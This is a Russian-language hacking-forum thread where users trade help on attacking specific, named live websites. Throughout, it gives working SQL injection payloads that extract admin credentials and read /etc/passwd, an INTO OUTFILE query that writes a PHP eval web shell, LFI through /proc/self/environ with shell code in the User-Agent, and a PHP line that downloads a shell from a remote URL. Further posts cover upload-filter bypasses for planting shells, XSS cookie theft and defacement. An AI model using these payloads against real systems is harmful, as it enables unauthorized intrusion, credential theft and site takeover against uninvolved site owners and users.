-1+UniON+SelEcT+1+into+outfile+'1.txt'-- = 0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f 757466696c652b5c27312e7478745c272d2d

http://site.ru/kat.php?id=-1+UnioN+SeELcT+0x2d312b556e694f4e2b53656c4563542b3 12b696e746f2b6f757466696c652b5c27312e7478745c272d2 d,2,version(),4--

Имеется доступ фтп к серверу (Topserver),

как узнать директорию доступную на запись (или поменять права на запись) и залить шел

если можно попобробней, а то я в этом не особо опытный!

Farboud said:
Имеется доступ фтп к серверу (Topserver),
как узнать директорию доступную на запись (или поменять права на запись) и залить шел
если можно попобробней, а то я в этом не особо опытный!


чет не понял...есть фтп доступ и нет прав на заливку? чет нереально

CyberHunter said:
Скажите как можно залить шелл через LFI?
Вот например
тут (http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../etc/passwd%00)
И какие нужны права на это?


Спасибо, классный инклуд.

Я зашеллил

Подсказка: енвирон

Dare said:
http://bible.com/bibleanswers_result.php?id=155%27+union+select+1,2 ,3,4,5,6,7,8,9--+
не могу вывести поля.
ни кто не подскажет в чем трабла?
критику принимаю достойно...


а кто сказал что должны всегда быть принтабельные поля?...

SeNaP said:
Как правильно составить двойной запрос?

PHP:

functionrecordcount_new($ps_sql){

global$conn_s;

$rs_s2=mysql_query("select COUNT(CODE) as count1 from ".$ps_sql,$conn_s);

$rs_s=mysql_fetch_array($rs_s2);

$pi_recordcount=$rs_s['count1'];

mysql_free_result($rs_s2);

if ($pi_recordcount=="")$pi_recordcount=0;

return$pi_recordcount;

}




PHP:
$rs_2=mysql_query("select * from tbl_subkat where KATCODE=".$GET['id']." order by POSITION, NAZV",$conn1);

while (($rs=mysql_fetch_assoc($rs_2))!==false) {

$pi2=recordcount_new("tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE'].")");



if ($pi2>0) echo' ('.$pi2.')';

}



-1+UniON+SelEcT+1+into+outfile+'1.txt'-- = 0x2d312b556e694f4e2b53656c4563542b312b696e746f2b6f 757466696c652b5c27312e7478745c272d2d
http://site.ru/kat.php?id=-1+UnioN+SeELcT+0x2d312b556e694f4e2b53656c4563542b3 12b696e746f2b6f757466696c652b5c27312e7478745c272d2 d,2,version(),4--


идем по порядку:

1) гет параметр передаецо только 1 и это id - других параметров не вижу

2) далее пошли перелопачивать все это(непонятно зачем селект был всего а работаем только с 1м столбцом)

3)потом через это рс начали делать запросы которые должны вернуть только число хотя мускулу пофиг в данном случае и проверок нет надлежащих, но смущает то что вывод происходит по именам столбцов а не по номерам(это и к первому и ко втророму куску кода относицо).

4) Наконец у нас в таблицах происходит выбор разного количества столбцов- а это уже в данном случае только блинда

последнее убивает окончательно:


PHP:
if ($pi2>0) echo' ('.$pi2.')';

если сервер настроен так что не будет выдавацо ошибок мускула то дело тухлое - так как не сможем проверить даже правильный или нет первый запрос

Gorev said:
чет не понял...есть фтп доступ и нет прав на заливку? чет нереально


да именно так, может потому что я пытаюсь залить через фтп клиент (FileZilla FTP Client)

Serbies, вроде я понял как делать. Вот только остался один вопрос , как произвести SQL inj тут?


PHP:
select COUNT(CODE) ascount1 from tbl_base whe re ISMODER=1and (SUBKAT1=".$rs['CODE']."orSUBKAT2=".$rs['CODE']."orSUBKAT3=".$rs['CODE'].")



$rs['CODE'] получаю от сюда


PHP:
$rs_2=mysql_query("select * from tbl_subkat where KATCODE=".$GET['id']." order by POSITION, NAZV",$conn1);

while (($rs=mysql_fetch_assoc($rs_2))!==false) {



т.е. 1,2,version(),4--

В таблице tbl_base находится 35 колонок

:."]
.:[melkiy]:. said:
Как вариант, можно регнуться, залить аватар с пхп кодом и проинклудить. Или инклудь логи, подробнее
тут (http://www.xakep.ru/post/49508/default.asp)
_http://www.stolarzowice.info/index.php?option=com_jesubmit&view=../../../../../../../../../../../../../proc/self/environ%00
в User-Agent пишешь код шелла.



Прошу прощения за возможный оффтоп. Подскажите, пожалуйста, как этот запрос


Code:
curl
"http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=phpinfo();"
-H "User-Agent: "

оформить правильно в php и что есть такое ключ -H ?

Можно ли эту конструкцию юзать GET-ом в FF и юзерагент там-же менять?

-H - дополнительный Header(заголовок) запроса


Можно ли эту конструкцию юзать GET-ом в FF и юзерагент там-же менять?


Можно

Потёр. Разобрался со слепой.

Скажите, если есть возможность выполнить произвольный код на сайте, то как можно залить шелл? Например:


Code:
http://www.site.com/view=../../../../../../../../../../../../../proc/self/environ%00&cmd=phpinfo%28%29;

Каким кодом заменить phpinfo();, чтобы залить шелл?

CyberHunter said:
Скажите, если есть возможность выполнить произвольный код на сайте, то как можно залить шелл? Например:

Code:
http://www.site.com/view=../../../../../../../../../../../../../proc/self/environ%00&cmd=phpinfo%28%29;

Каким кодом заменить phpinfo();, чтобы залить шелл?




PHP:
fwrite(fopen('./file.php','w+'),file_get_contents('URL_до_ТХТ _с_шеллом'));

CyberHunter said:
Скажите, если есть возможность выполнить произвольный код на сайте, то как можно залить шелл? Например:

Code:
http://www.site.com/view=../../../../../../../../../../../../../proc/self/environ%00&cmd=phpinfo%28%29;

Каким кодом заменить phpinfo();, чтобы залить шелл?


eval, passthru

Iggy said:
load_file()?!



Si tacuisses, philosophus mansisses (Boetius)

Имеется запрос:


Code:
(select+1+from+(select+count(0),concat((select+con cat_ws(0x3a,username,password)+from+admins+limit+0 ,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+

нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.

Rabben said:
нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.


имеешь ввиду "update admins set password=......" ?

насколько я знаю, комбинировать запросы select и update нельзя

помогите, как правильно сделать запрос ?

site.com/search/?search=1&search_words=j&search_section_id=25'&search_cond=1&search_numrows=10

DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326

Rabben said:
Имеется запрос:

Code:
(select+1+from+(select+count(0),concat((select+con cat_ws(0x3a,username,password)+from+admins+limit+0 ,1),floor(rand(0)*2))+from+admins+group+by+2)a)--+

нужно переделать под замену значения password, тоесть хочу подменить использующийся уже password.


если бы можно было запросом из браузера изменять значения в БД, то я думаю % похеканных сайтов стал намного больше, и раздел рашифровка хешей не нужен был бы совсем...

Cybersteger said:
помогите, как правильно сделать запрос ?
site.com/search/?search=1&search_words=j&search_section_id=25'&search_cond=1&search_numrows=10
DB query error: SELECT t.tr_id FROM t_tree_index as ti, t_tree as t, t_tree_visible as tv WHERE (ti.parent_id=25' OR ti.tr_id=25') AND ti.tr_id=t.tr_id AND t.lang_id='3' AND t.tr_id=tv.tr_id AND tv.lang_id='3' AND tv.part_id='1' /var/www/localhost/htdocs/site/back/inc/db_mysql.php on line 326


да что же такое? откуда вы все нарисовались с такими умными вопросами? почитай-ка клац (https://antichat.live/threads/104591/)

мда чел .. я это читал и нераз, помогало, но не в этом случае, я хз как здесь делать, комментарием после WHERE (ti.parent_id=2 order by 1/* OR ti.tr_id=2 order by 1/*) (-- ,+--+,#...) нелзя закрыть, а в пидзапросах полохо понимаю потому и запостив мб кто-то знает (мне кажется здесь должен быть пидзапрос).

Тебе нужен примерно такой результат: WHERE (ti.parent_id=2) order by 1/*

Подсказка есть - пробуй.

ага ) (site.com/search/?search=1&search_words=jjh&search_section_id=9999999)+and+ExtractValue(1,conc at(0x5c,(user())))--)

MySQL Error : XPATH syntax error: '\user@127.0.0.2'

только теперь непонятно, версия 5.1.41 , а infromation_schema будто нет что это?

site.com/search/?search=1&search_words=jjh&search_section_id=9999999)+and+ExtractValue(1,conc at(0x5c,(select+schema_name+from+infromation_schem a.schemata+limit+1,1)))--

MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata'

.....ExtractValue(1,concat(0x5c,(select+schema_nam e+from+infromation_schedasdma.schemata+limit+1,1)) )--

MySQL Error : SELECT command denied to user 'user'@'127.0.0.2' for table 'schemata' --одинаково потому и думаю что infromation_schema нет

вобщем есть запрос на выборку из таблы ibf_members

символ "_"(в имени таблицы) заменяется на "ampersand#95;"

и только в тех случаях, когда в строке(имя таблицы) есть "ibf_".

в остальных случаях "_" проходит.

Есть мысли? И как возможно это обойти?

Спасибо.

//пробовал с помощью подзапроса - не вышло.

ггг, сенкю

А можно ли че нить сделать с этим http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=17416'

Fak1r said:
А можно ли че нить сделать с этим http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=17416'


_http://www.printcopy.info/index.php?l=ru&mod=docs&brand=Canon&gID=-17416'+UNION+SELECT+1,USER(),VERSION(),4,DATABASE( ),6,7,8,9,10+--+

http://www.besedin.com/zerkalo/foto.php?id=-6075%27+union+select+1,LOAD_FILE%28%27/etc/passwd%27%29,3,4,5+from+mysql.user--+

не могу найти пути

Помогите плз

День добрый, есть линк


id=-1+union+select+1,2,concat_ws(char(59),ConfigName,C onfigValue),4,5,6,7,8,9+from+settings+where+Config Name='foot'+--+


отлично работает. нужно проапдейтить ConfigValue, update после юниона не канает


-1+union+update+settings+set+ConfigValue=0x61+where +ConfigName=0x666F6F74+--+


можно ли сделать что-то вроде


-1+||+(update+settings+set+ConfigValue=0x61+where+C onfigName=0x666F6F74)+--+


как быть?

*линк пмну, это бескартонный шоп, но нужен =__=

Aels said:
День добрый, есть линк
отлично работает. нужно проапдейтить ConfigValue, update после юниона не канает
можно ли сделать что-то вроде
как быть?
*линк пмну, это бескартонный шоп, но нужен =__=


нельзя

shuba said:
http://www.besedin.com/zerkalo/foto.php?id=-6075%27+union+select+1,LOAD_FILE%28%27/etc/passwd%27%29,3,4,5+from+mysql.user--+
не могу найти пути
Помогите плз


ищи в конфигах путь

клац (https://antichat.live/threads/49775/)

Есть SQL-INJ


PHP:
andExtractValue(1,concat(0x5c,(select version())) )--+

фильтруются слова union|where|table_name|user|column_name|, самое главное это table_name, какими способами возможно обойти фильтр на слово table_name, ибо узнать таблицу с админа не как не удается..

делал


PHP:
andExtractValue(1,concat(0x5c,(select unhex(0x746 1626C655F6E616D65)from information_schema.tables� �limit 16,1)))--+

результата не дало..

С регистром играться не пробовал?

пробовал )

Попробуй tatable_nameble_name

Возможно ли здесь обойти фильтрацию select?


Code:
http://www.bestbets.org/bets/bet.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37+--+

Помогите разобраться с этим постом

/showpost.php?p=1304326&postcount=93 (https://antichat.live/showpost.php/p/1304326/postcount/93/)

Не могу понять одного ...


Code:
id=1+and+1=if(load_file('/etc/passwd')+is+not+NULL,1,2)--+

Что значит +is+not+NULL,1,2 и зависит ли такой запрос от кол-во колонок ?

И где можно почитать про под запросы?

SeNaP said:
Помогите разобраться с этим постом
/showpost.php?p=1304326&postcount=93 (https://antichat.live/showpost.php/p/1304326/postcount/93/)
Не могу понять одного ...

Code:
id=1+and+1=if(load_file('/etc/passwd')+is+not+NULL,1,2)--+

Что значит +is+not+NULL,1,2 и зависит ли такой запрос от кол-во колонок ?
И где можно почитать про под запросы?


Если привелегия file_priv есть, то тогда


Code:
if(load_file('/etc/passwd')+is+not+NULL,1,2)

превратится в 1 и финальный запрос будет выглядить как

...


Code:
id=1+and+1=1--+

то есть условие будет верно. В противном случае будет 2 и условие не сработает, то есть


Code:
id=1+and+1=2--+

Подскажите как можно залить шелл через такой инклуд?


PHP:

Алкорайдер, где ты там инкуд увидел?

UPD:

Вроде справился с двойным запросом при заливки шелла, файл создается, но вот только почему то с содержанием 1 или 0

Если select 'test' то пишется в файл 0

Если select 123 то пишется в файл 1

сам запрос выглядит так

select COUNT(CODE) as count1 from tbl_base where ISMODER=1 and (SUBKAT1=".$rs['CODE']." or SUBKAT2=".$rs['CODE']." or SUBKAT3=".$rs['CODE']

Делаю так

53 and if((select 123 into outfile '/tmp/test7.txt'),53,54)=53

Можно только произвольные файлы читать, не более.

как обойти эту хрень?

http://www.salesbearing.com/admin/

Подскажите, какие уязвимости есть в phpPgAdmin 4.2.2 (PHP 4.4.9).

Можно ли как нибудь авторизироватся? И вообще можно ли залить шелл через нее?

раскрытие путей:

http://site.com/phpPgAdmin/sqledit.php?server[]=%3A5432%3Aallow&action=sql

http://site.com/phpPgAdmin/libraries/lib.inc.php

http://feel3.lviv.ua/catalog/index.php?cPath=-1+'

Помогите роскрутить скул

FlaktW said:
Возможно ли здесь обойти фильтрацию select?

Code:
http://www.bestbets.org/bets/bet.php?id=-27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37+--+



Здесь походу, is_numeric().

dr0wzee said:
Здесь походу, is_numeric().


Если order by пропускает, то точно не is_numeric()

http://uralpress.ru/admin

как только перехожу по ссылке сразу редиректит на главнуююю...как попасть в админку?)

А с чего ты взял что это и есть админка, она может быть по другому пути

и точто в роботс написано что /admin/

это еще не значит что но там и есть

Прошу помочь реальную админку=)

jecka3000 said:
http://uralpress.ru/admin
как только перехожу по ссылке сразу редиректит на главнуююю...как попасть в админку?)


Вообще вот она - http://uralpress.ru/admin/phpmyadmin/index.php

Но как я понял там прав не хватает чтоле)

ZARO, это пхпмай админ, а мне нужна просто админка, чтобы в панель администратора попасть)

jecka3000 said:
ZARO, это пхпмай админ, а мне нужна просто админка, чтобы в панель администратора попасть)[/QUOT]
Я думаю, что здесь админка.

Code:
http://uralpress.ru/sign

есть возможность провести XSS, но есть одна проблема, фильтруется + (из-за magic_quotes), как провести кражу куков если фильтруется + ? (точнее не фильтруется, а заменяется на пробел) пробывал подставлять %2B

а кто подскажет как залить шелл через tiny_mce редактор?

Попробуй через загрузку картинок.

Я заливал так:

123.gif.php

Там идет фильтрация кривая, не поможет, попробуй поменять.

Например:

123.php.gifs

Или если ооочень повезет, заливай .htaccess с содержимым:


AddType application/x-httpd-php jpg


, а затем сам шел переименовый в 123.gif

Ershik said:
Попробуй через загрузку картинок.
Я заливал так:
123.gif.php
Там идет фильтрация кривая, не поможет, попробуй поменять.
Например:
123.php.gifs
Или если ооочень повезет, заливай .htaccess с содержимым:
, а затем сам шел переименовый в 123.gif


спасибо попробовал, ни один из вариантов не подошёл

Bramin said:
спасибо попробовал, ни один из вариантов не подошёл



Залей просто картинку, посмотри отправляемые пакеты. Смотрим что-то вроде Content-type: image/gif. Потом залей файл shell.gif.php (сам шелл или нужный файл), перехвати пакеты через Temper Data. Найди строку с Content-type: textили как-то так будет и замени на Content-type: image/gif

есть скуль на mssql. просмотрел таблицы, нашёл "admin". в ней столбцы типа id, name...

делаю запрос


Code:
http://site.com/site.asp?ID=-1+UNION+ALL+SELECT+1,id+from+admin--

получаю ошибку [ODBC SQL Server Driver][SQL Server]Invalid object name 'admin'.

в чём дело? таблица точно существует.

BrainDeaD said:
есть скуль на mssql. просмотрел таблицы, нашёл "admin". в ней столбцы типа id, name...
делаю запрос

Code:
http://site.com/site.asp?ID=-1+UNION+ALL+SELECT+1,id+from+admin--

получаю ошибку [ODBC SQL Server Driver][SQL Server]Invalid object name 'admin'.
в чём дело? таблица точно существует.


может быть другая база, Смотри имя базы

а потом select tra,la,la+from+schema.table

хотя на mssql не проверил

вот скуль, которая нормально выводит таблици


http://www.grovearcade.com/index.php?page=-6+union+select+1,2,3,table_name,5,6,7,version(),9, 0,11,12+from+information_schema.tables--


но когда заглядываеш в сами таблици ничего не выводит


http://www.grovearcade.com/index.php?page=-6+union+select+1,2,3,concat_ws(0x3a,user,password) ,5,6,7,8,9,0,11,12+from+user--


при таком запросе ничего не выводит, в чем может быть проблема?

winstrool said:
вот скуль, которая нормально выводит таблици
но когда заглядываеш в сами таблици ничего не выводит
при таком запросе ничего не выводит, в чем может быть проблема?


На этом сайте не 1 бд. Когда их более 1 нужно указывать откуды выводишь данные.

Вот будет правильно:


Code:
http://www.grovearcade.com/index.php?page=-6+union+select+1,2,3,concat_ws(0x3a,user,password) %20,5,6,7,8,9,0,11,12+from+mysql.user--

winstrool said:
вот скуль, которая нормально выводит таблици
но когда заглядываеш в сами таблици ничего не выводит
при таком запросе ничего не выводит, в чем может быть проблема?



http://www.grovearcade.com/index.php?page=-6+UNION+SELECT+1,2,3,(SELECT+CONCAT_WS(0x3a,UserNa me,Password)+FROM+grovearcade.accounts+LIMIT+0,1), 5,6,7,8,9,10,11,12--

и заметь что там юзверь под которым крутится БД , root ...читаются файлы на серванте(Load_file ), попробуй еще INTO+OUTFILE может шелл зальешь если путь абсолютный узнаешь

путь /var/www/html

также есть phpmyadmin но с бейсик авторизацией, но так как файлы читаются..остается прочитать нужный файл....

http://www.grovearcade.com/manager

думаю что шелл практически у тебя в руках..ну и раз выложил сюда скулю..то скоро там шеллов как граблей на огороде будет

Gorev said:
http://www.grovearcade.com/index.php?page=-6+UNION+SELECT+1,2,3,(SELECT+CONCAT_WS(0x3a,UserNa me,Password)+FROM+grovearcade.accounts+LIMIT+0,1), 5,6,7,8,9,10,11,12--
и заметь что там юзверь под которым крутится БД , root ...читаются файлы на серванте(Load_file ), попробуй еще INTO+OUTFILE может шелл зальешь если путь абсолютный узнаешь
путь /var/www/html
также есть phpmyadmin но с бейсик авторизацией, но так как файлы читаются..остается прочитать нужный файл....


Через эту скулю шелл не зальётся, она ковычки не экранирует.

ZARO said:
Через эту скулю шелл не зальётся, она ковычки не экранирует.


ну ну...некоторые не зальют...

Обьясните как правильно шелл можно залить, что то не получается

Ты через админку или как?

через такой запрос я по логике должен залить шелл по адресу /var/www/html/1.php


http://www.grovearcade.com/index.php?page=-6+union+select+1,2,3,4,5,6,7,char(39,60,63,112,104 ,112,32,101,118,97,108,40,36,95,71,69,84,91,39,101 ,39,93,41,32,63,62,39),9,0,11,12+into+outfile+char (39,47,118,97,114,47,119,119,119,47,104,116,109,10 8,47,49,46,112,104,112,39)--


ну не понятно заливается он или нет и п оследущему запросу я пытаюсь вызвать шелл, но опять же ничего не получается(((


http://www.grovearcade.com/index.php?page=-6+union+select+1,2,3,4,5,6,7,LOAD_FILE(char(39,60, 63,112,104,112,32,101,118,97,108,40,36,95,71,69,84 ,91,39,101,39,93,41,32,63,62,39)),9,0,11,12--&e=id


ctacok: into outfile char?

Чарить хексить и т.п. нельзя, только ковычки.

winstrool, нельзя чарить путь в INTO OUTFILE.

Ctacok, есть такие кнопочки - "Post reply" && "Быстрый ответ" =)

Ctacok: Я не люблю гадить.


ZARO said:
Через эту скулю шелл не зальётся, она ковычки не экранирует.


Какраз таки экранирует =)

Добрый день! Подскажите пожалуйста, можно ли как-то использовать удаленно через ip открытый порт 69 TFTP?

http://www.portugal-tchat.com/host_mes_images/view/870+union+select+1,2,3,4,5,6,7,8,9,10,11

подскажите, куды копать дальше?

URL уязвима

но я не могу найти число столбцов

http://www.team-dignitas.org/index.php?id=10104

linuxkernal said:
URL уязвима
но я не могу найти число столбцов
http://www.team-dignitas.org/index.php?id=10104


крути как слепую..в ошибке указанно почему не можешь найти количество столбцов

http://www.team-dignitas.org/index.php?id=10104'+and+(select+1+from+(select+cou nt(0),concat((select+version()),floor(rand(0)*2))+ from+news+group+by+2+limit+1)a)--+

By Pashkela

durito said:
http://www.portugal-tchat.com/host_mes_images/view/870+union+select+1,2,3,4,5,6,7,8,9,10,11
подскажите, куды копать дальше?


Помойму это не скуль!

durito said:
http://www.portugal-tchat.com/host_mes_images/view/870+union+select+1,2,3,4,5,6,7,8,9,10,11
подскажите, куды копать дальше?


Как вариант...

http://www.portugal-tchat.com/host_mes_images/view/870+and+if(mid(version(),1,1)=5,1,(select+1+union+ select+2))

Условие выполняется - картинка, не выполняется - error.

Возможно все гораздо проще можно сделать...

Ребята, подскажи по поводу использования UPDATE в инъекциях.

Значит есть инъекция

UNION+SELECT+1,test_data,3+FROM+test_table+--+

пробую изменить значение test_data допустим на 12345 вот таким запросом

UNION+UPDATE+test_table+SET+test_data='12345'+WHER E+test_data2='lol'+--+

в результате выбивает ошибку вида


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION+UPDATE+test_table+SET+test_data='12345'+WHE RE+test_data2='lol'+--+' at line 1


пробовал заменять значение на HEX кодировку, то есть вместо ='12345' тулил =0x3132333435. Результат - опять таки ошибка.

Подскажите, может быть я не так использую UPDATE, и всё дело в неправильном синтаксисе? Заранее благодарен.

Если запрсос select, значит SELECT, нельзя insert, update, и т.п., можно только выборку из бд делать.

А если у нас основной запрос вроде INSERT+INTO+test_table+(test_data)+VALUES+(lol), то UNION INSERT или UNION UPDATE прокатит?

Нет. Вы вообще вкурсе что делает union?

мдяс, думаю на лето надо закрыть данный раздел..так как 99% вопросы по скулям..причем стандартные вопросы, ответы на которые можно спокойно найти на форуме потратив 30 секунд

Этот сайт позволяет file_priv, но мы можем заполнить оболочку?

http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+

как получив шелл на фтп, можно заменить все шаблоны в БАЗЕ данных на вредноносный код(дефейс)?

haito said:
Этот сайт позволяет file_priv, но мы можем заполнить оболочку?
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, file_priv,3,4,5,6,7,8,9%20from%20mysql.user+--+


У твоего пользователя нету file_priv:


Code:
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, user(),3,4,5,6,7,8,9+--+

Получаем юзера - DCE. Смотрим дальше:


Code:
http://www.dce.hcmut.edu.vn/vi/tintuc/index.php?id=400%20and%201=0%20UNION%20SELECT%201, concat_ws(0x3a,user,file_priv),'3',4,5,6,7,8,9%20f rom%20mysql.user+limit+5,1+--+

Результат:


Code:
DCE:N

как использовать " PUT " уязвимость, в FTP ?..... (удаленный сервер)